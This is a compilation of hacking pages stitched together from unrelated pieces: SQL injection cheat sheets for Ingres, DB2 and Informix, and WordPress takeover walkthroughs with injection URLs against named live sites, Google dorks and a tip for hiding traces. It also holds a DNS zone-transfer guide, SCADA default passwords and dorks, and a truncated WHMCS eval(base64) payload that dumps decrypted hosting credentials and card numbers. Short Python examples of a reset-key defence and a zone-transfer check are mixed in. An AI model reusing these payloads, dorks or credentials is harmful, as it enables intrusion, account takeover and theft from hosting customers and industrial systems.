SELECT name FROM iidatabase WHERE own = '$ingres' -- connect to iidbdb

Installing Locally:
The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be downloaded from http://www.vmware.com/appliances/directory/832

Database Client:
TODO. There is a client called "sql" which can be used for local connections (at least) in the database server package above.

Logging in from command line:
$ su - ingres
$ sql iidbdb
* select dbmsinfo('_version');\go

Identifying on the network:
TODO

The following areas are interesting enough to include on this page, but I haven't researched them for other databases:

Batching Queries Allowed?
Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select ... -- doesn't matter, this is ignored.

FROM clause mandated in SELECTs?
No. You don't need to select from "dual" or anything. The following is legal:
select 1;

UNION supported?
Yes. Nothing tricky here. The following is legal:
select 1 union select 2;

Enumerate Table Privs:
select table_name, permit_user, permit_type from iiaccess;

Length of a string:
select length('abc'); -- returns 3

Roles and passwords:
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;

List Database Procedures:
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;

Create Users + Granting Privs:
First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;
DB2 SQL Injection Cheat Sheet

Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though, it pays to be prepared... Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows. This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version:
select versionnumber, version_timestamp from sysibm.sysversions;

Comments:
select blah from foo; -- comment like this

Current User:
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users:
N/A (I think DB2 uses OS-level user accounts for authentication.) Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes:
N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges:
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH -- list db2 system privileges

List DBA Accounts:
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'

Current Database:
select current server from sysibm.sysdummy1;

List Databases:
SELECT schemaname FROM syscat.schemata;

List Columns:
select name, tbname, coltype from sysibm.syscolumns;

List Tables:
select name from sysibm.systables;

Find Tables From Column Name:
select tbname from sysibm.syscolumns where name = 'username'

Select Nth Row:
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char:
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

Bitwise AND:
This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Char:
select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char -> ASCII Value:
select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting:
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation:
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Informix SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into Informix databases... Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here. This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Version:
SELECT DBINFO('version','full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','major'), DBINFO('version','minor'), DBINFO('version','level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','os') FROM systables WHERE tabid = 1; -- T=Windows, U=32-bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit Unix

Comments:
select 1 FROM systables WHERE tabid = 1; -- comment

Current User:
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;

List Users:
select username, usertype, password from sysusers;

List Password Hashes:
TODO

List Privileges:
select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users

List DBA Accounts:
TODO

Current Database:
SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name

List Databases:
select name, owner from sysdatabases;

List Columns:
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;

List Tables:
select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;

List Stored Procedures:
select procname, owner FROM sysprocedures;

Find Tables From Column Name:
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';

Select Nth Row:
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row

Select Nth Char:
SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C'

Bitwise AND:
select bitand(6,1) from systables where tabid = 1; -- returns 0
select bitand(6,2) from systables where tabid = 1; -- returns 2

ASCII Value -> Char:
TODO

Char -> ASCII Value:
select ascii('A') from systables where tabid = 1;

Casting:
select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;

String Concatenation:
SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A','B') FROM systables where tabid = 1; -- returns 'AB'

String Length:
SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;

If Statement:
TODO

Case Statement:
select tabid, case when tabid > 10 then 'High' else 'Low' end from systables;

Avoiding Quotes:
TODO

Time Delay:
TODO

Make DNS Requests:
TODO

Command Execution:
TODO

Local File Access:
TODO

Hostname, IP Address:
SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname

Location of DB files:
TODO

Default/System Databases:
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don't seem to contain anything / don't allow reading

Installing Locally:
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.

Database Client:
There's a database client SDK available, but I couldn't get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers ("emerge dev-java/jdbc-informix" on Gentoo).

Logging in from command line:
If you get local admin rights on a Windows box and have a GUI logon:
 Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various environment variables set properly.
 Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.
The following were set on my test system. This may help if you get command line access but can't get a GUI (you'll need to change "testservername"):
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Client-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252

Identifying on the network:
My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all
...
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
...
TODO: How would we identify Informix listening on the network?
WordPress Hacking Tricks

I. Hacking WordPress (without cracking the hashes)

This does not work against the latest version of WordPress at the time of writing, 3.4.2, released on 6 September 2012. Things you need:
1) any WordPress SQLi dork (you can get one from exploit-db.com)
2) knowledge of SQLi (this thread is not about SQLi)

Let's start.

1) My dork
There are a number of SQLi exploits in different WordPress plugins and themes. The one I'm picking is in the plugin called Wp-FacebookConnect, and the Google dork for it is:
Code :
inurl:"/?fbconnect_action=myhome"
Paste this into google.com (one of my best friends) and you will see a number of vulnerable websites.

2) The website I'm going to use here is:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
Here the parameter userid is vulnerable to SQLi, so let's see what we can get from the database. I'm going to change the above URL to this (a 12-column UNION; the sixth column is the one reflected in the page):
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--
Now you can see we got the username with the e-mail address. If I change the URL to this:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
I get the username and the hashed password. (Note that I'm using concat here; you can also use group_concat to get all the users at once. Again, how you use SQLi is your own knowledge.)

WordPress password hashes are phpass portable hashes (the $P$ format: salted and iterated MD5, different from plain MD5) and are slow to crack. But if you're mad, think outside the box and follow these steps:
a) Go to the login page of the WordPress site, in my case:
Code :
http://masaru.ikeda.me/wp-login.php
b) Click "Lost your password?".
c) WordPress asks for the username or e-mail for which you want to reset the password. In my case that is 'masaru', so go ahead and enter the username.
d) Look closely: it says "Check your e-mail for the confirmation link."
e) What WordPress actually does is send an activation key to that user's e-mail address, and it stores the same key, as-is, in the user_activation_key column of wp_users. All you have to do is read that key.
f) So I change my URL to this to get the activation key:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
NOTE: we got the activation key here; note it down somewhere.
g) Finally, without ever going to the mailbox, reset the password. For that, request this path on the site:
Code :
wp-login.php?action=rp&key=KEYHERE&login=USERNAMEHERE
replacing KEYHERE with the activation key I got and USERNAMEHERE with the username, which in my case is 'masaru', so my URL is:
Code :
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
And voila, WordPress will ask you for your new password. Now go to the login page again and try the new password, and there you go, you have access to the panel. Now you know how to shell the WordPress site, don't you?

Tricks for those who are actually MAD:
1) To check quickly whether a website is using the latest version, 3.4.2, or an earlier one: go to the login page and see whether there is a link there to go back to the main page of the blog, like the "<- Back to Digital Way of Living" link in my case. If it is there, this is not 3.4.2; if you don't see it, it is 3.4.2. This trick is not legit; I figured it out and it is working for me.
2) Once you have shelled the website, get the database details, use any database connector, go to the wp_users table and, in the user_pass column, replace the hash with the one you got at the very beginning (the actual hash of the admin). Now the password is again what it was before, as if nothing happened; the admin will never know what hit them.

In the latest version, 3.4.2, after confirming the activation key WordPress does not let you choose a new password; instead it sends you a random password by e-mail.
How To Hack WordPress Websites using SQL Injection: Hacking Tutorial

What is WordPress?
WordPress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL. It has many features, including a plug-in architecture and a template system. WordPress is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003, by founder Matt Mullenweg.

Now let's move on to hacking a website. I have used the SQLi vulnerability in the all-video-gallery WordPress plugin here.

1> First we find a target using a Google dork:
inurl:all-video-gallery/config.php?vid=
2> Open any website. In my case it's juangrial.com.
3> Now let's do a SQL injection: copy the exploit code, hit enter and see the magic :)
Exploit code for finding username & password (a 41-column UNION; the fifth column is the one reflected in the page):
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
You can also try this; both work the same way.
Exploit code for finding username & e-mail:
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
4> We got the admin e-mail. Now let's reset it. For that go to http://site.com/wp-admin or https://site.com/wp-login.php, then click "Lost Password".
5> Enter the e-mail we got in the earlier steps.
6> Now come back and read the activation key from the table.
Exploit code for the activation key:
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,
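Both WordPress walkthroughs above hinge on the same weakness: the password-reset key is stored in wp_users.user_activation_key in exactly the form that is e-mailed, so a read-only SQL injection is enough to finish the reset without touching the mailbox. The following Python is an added example (not code from the page or from WordPress) that models that vulnerable flow beside the hardened one WordPress adopted in 3.7, where only a timestamp and a hash of the key are stored and the key expires. The in-memory table, the user 'masaru', the 24-hour lifetime and the SHA-256 stand-in for WordPress's phpass hashing are assumptions made for the demo.

```python
import hashlib
import hmac
import secrets
import time


def fresh_db():
    # Constructed stand-in for the wp_users table: one row, keyed by user_login.
    return {"masaru": {"user_email": "masaru@example.com", "user_activation_key": ""}}


def issue_key_plaintext(db, login):
    """Vulnerable flow (as on the page): the raw key is e-mailed AND stored verbatim."""
    key = secrets.token_urlsafe(15)
    db[login]["user_activation_key"] = key
    return key  # this is what the e-mail would carry


def check_key_plaintext(db, login, key):
    stored = db[login]["user_activation_key"]
    return bool(stored) and hmac.compare_digest(stored, key)


def issue_key_hashed(db, login, now=None):
    """Hardened flow (WordPress 3.7+ stores time:hash; SHA-256 stands in for phpass here)."""
    key = secrets.token_urlsafe(15)
    issued = int(now if now is not None else time.time())
    digest = hashlib.sha256(key.encode()).hexdigest()
    db[login]["user_activation_key"] = f"{issued}:{digest}"
    return key  # only the e-mail ever sees the raw key


def check_key_hashed(db, login, key, now=None, max_age=86400):
    stored = db[login]["user_activation_key"]
    if ":" not in stored:
        return False
    issued, digest = stored.split(":", 1)
    current = int(now if now is not None else time.time())
    if current - int(issued) > max_age:  # keys expire, which also limits an old DB dump
        return False
    return hmac.compare_digest(digest, hashlib.sha256(key.encode()).hexdigest())


def sqli_leak(db, login):
    """What the UNION SELECT ... user_activation_key ... FROM wp_users query hands the attacker."""
    return db[login]["user_activation_key"]


def attacker_can_reset(issue, check, db, login):
    """Attacker triggers 'Lost your password?', reads the column via SQLi, then tries it as ?key=."""
    issue(db, login)
    leaked = sqli_leak(db, login)
    return check(db, login, leaked)


if __name__ == "__main__":
    print("plaintext key, reset possible:",
          attacker_can_reset(issue_key_plaintext, check_key_plaintext, fresh_db(), "masaru"))
    print("hashed key, reset possible:   ",
          attacker_can_reset(issue_key_hashed, check_key_hashed, fresh_db(), "masaru"))
```

With the hashed scheme the leaked column is a digest, not a key; submitting it as ?key= fails, and even the real key stops working after max_age, so the SQL injection alone no longer yields an account takeover (it still leaks the hashes, which is a separate problem).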
DNS Zone Transfer Vulnerability Exploit

 Scan the website with Acunetix Web Vulnerability Scanner.
 If it reports a DNS zone transfer vulnerability, open a command prompt (Run > cmd) and use nslookup:
 type > nslookup
 type > server <name server of the target domain>
 type > set type=any
 type > ls -d <domain name>
If the name server allows the transfer, ls -d lists every record in the zone (hostnames, internal addresses, mail and name servers). A correctly configured server refuses the request ("Query refused"), because zone transfers should only be permitted to the domain's own secondary name servers.
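The nslookup steps above are one way to ask a name server for a zone transfer; what actually goes over the wire is a DNS query of type AXFR (252) over TCP. The following Python is an added example, not from the original page, that builds that query with the standard library, sends it to a name server of your choosing, and parses the records that come back; a hardened server answers with RCODE 5 (REFUSED) and no records. The domain example.com, the name-server argument and the embedded sample response are constructed for the demo.

```python
import socket
import struct

QTYPE_AXFR, QTYPE_A, QTYPE_SOA = 252, 1, 6
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(domain):
    """Wire-format a domain name: length-prefixed labels terminated by a zero byte."""
    labels = domain.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_axfr_query(domain, txid=0x1337):
    """DNS header + one AXFR question, with the 2-byte length prefix that TCP DNS requires."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags 0: plain query
    question = encode_name(domain) + struct.pack(">HH", QTYPE_AXFR, 1)  # class IN
    message = header + question
    return struct.pack(">H", len(message)) + message


def read_name(msg, off):
    """Decode a possibly compressed name (RFC 1035 4.1.4); returns (name, offset after it)."""
    labels, end, jumps = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            if end is None:
                end = off + 2
            jumps += 1
            if jumps > 16:  # a looping pointer chain is malformed, not a real zone
                raise ValueError("compression pointer loop")
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_records(msg):
    """Return (rcode, [(name, qtype, rdata), ...]) for the answer section of one DNS message."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):  # skip the echoed question(s)
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        name, off = read_name(msg, off)
        qtype, _qclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        records.append((name, qtype, msg[off:off + rdlen]))
        off += rdlen
    return flags & 0x000F, records


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("name server closed the connection")
        buf += chunk
    return buf


def axfr(domain, nameserver, port=53, timeout=5.0):
    """Live check: returns (rcode name, records). Records coming back means transfers are open."""
    with socket.create_connection((nameserver, port), timeout=timeout) as s:
        s.sendall(build_axfr_query(domain))
        records, soa_seen, rcode = [], 0, 0
        while soa_seen < 2:  # an AXFR payload is bracketed by two SOA records
            (length,) = struct.unpack(">H", _recv_exact(s, 2))
            rcode, recs = parse_records(_recv_exact(s, length))
            if rcode != 0 or not recs:
                break
            soa_seen += sum(1 for r in recs if r[1] == QTYPE_SOA)
            records.extend(recs)
    return RCODE_NAMES.get(rcode, str(rcode)), records


# Constructed sample response (SOA, an A record using name compression, SOA) so the parser
# can be exercised offline; the address and the 4-byte SOA rdata are placeholders.
_q = encode_name("example.com") + struct.pack(">HH", QTYPE_AXFR, 1)
_soa = b"\xc0\x0c" + struct.pack(">HHIH", QTYPE_SOA, 1, 3600, 4) + b"\x00\x00\x00\x01"
_a = b"\x03www\xc0\x0c" + struct.pack(">HHIH", QTYPE_A, 1, 300, 4) + bytes([93, 184, 216, 34])
SAMPLE_RESPONSE = struct.pack(">HHHHHH", 0x1337, 0x8180, 1, 3, 0, 0) + _q + _soa + _a + _soa

if __name__ == "__main__":
    rcode, recs = parse_records(SAMPLE_RESPONSE)
    print(RCODE_NAMES[rcode], recs)
```

To test a real zone, call axfr("target.example", "<ip of one of its NS records>") for every authoritative server, since transfer ACLs are configured per server and one misconfigured secondary is enough.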
Hacking SCADA Systems

With the discovery of Stuxnet and all the subsequent interest in industrial control systems, it's worthwhile to learn a bit about how to exploit these for our own purposes. For now it's a copy-paste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research.

Contents:
 Terminology
 Default Passwords
 Google Dorks
 Vulnerabilities and Other Resources

Terminology:
PLC: Programmable Logic Controller
RTU: Remote Terminal Unit
HMI: Human-Machine Interface

Default Passwords:
These should always be your first try if you come across an HMI. Because these systems have only recently started to receive attention, many of these HMIs still have their defaults. They can be accessed through a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems. Entries are username:password.

Schneider Electric:
pcfactory:pcfactory
loader:fwdownload
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
test:testingpw
USER:USER
USER:USERUSER
webserver:webpages
fdrusers:sresurdf
nic2212:poiuypoiuy
nimrohs2212:qwertyqwerty
nip2212:fcsdfcsd
ftpuser:ftpuser
noe77111_v500:RcSyyebczS
AUTCSE:RybQRceeSd
AUT_CSE:cQdd9debez
target:RcQbRbzRyc

Siemens Simatic:
Administrator:100

Siemens WinCC:
WinCCConnect:2WSXcder
WinCCAdmin:2WSXcder

WAGO:
admin:wago

Google Dorks:
These will be added to as I go along, but here are a couple you can try out to search for HMIs.
inurl:/plc/webvisu.htm
"Miniweb on" "Control Functions" -filetype:pdf

Vulnerabilities and Other Resources:
 Vulnerabilities in some SCADA server softwares
 Metasploit Modules for SCADA-related Vulnerabilities
 SIMATIC HMI panels - some default Simatic HMIs you can play around with
WHMCS Hacking with the Submit Ticket exploit

Hi mates! Today we are going to learn how to hack WHMCS with what you could call its submit ticket exploit, through which we get the cPanel usernames and passwords of the hosting panel and of the websites hosted on that WHMCS.

How it works: {php}...{/php} is Smarty template syntax. The ticket subject is fed to WHMCS's Smarty template engine with the {php} tag enabled, so whatever is placed between {php} and {/php} in the subject runs as PHP on the server when the ticket page is rendered. The base64 blob in the first payload below decodes to PHP that includes WHMCS's configuration.php, reads tblservers, tblregistrars, tblconfiguration (the FTP backup and SMTP settings), tblhosting and tblclients, decrypts the stored passwords and card numbers with the $cc_encryption_hash from configuration.php, and echoes the result into the page.

Let's start.
Step 1: Find a website that provides hosting and locate the "Submit Ticket" option.
Step 2: Open Submit Ticket and choose the sales department.
Step 3: Fill in the form fields (name, e-mail address, urgency) with any random values; the field that matters is the subject.
    fill this codein subject field : {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQ okcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQok dGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAj IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2h fYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw 0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQo kYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQ oNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW 9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9J HRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJG hvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJH RleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc 3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio qKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMj IyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokd GV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbG VyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9 xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0 gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2Wyd yZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGR lY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmF sdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2
    WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkc mVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxy XG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMj IyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjI yMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkk cXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uI HdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYW NrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGl uZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3Ig IHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciA gc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCR xdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJH ZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS 4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjI yMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI 7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbn QgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlz cWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICd yb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIH VzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhd G9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlz cWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21ha W4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlc m5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3 N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tY Wluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy 
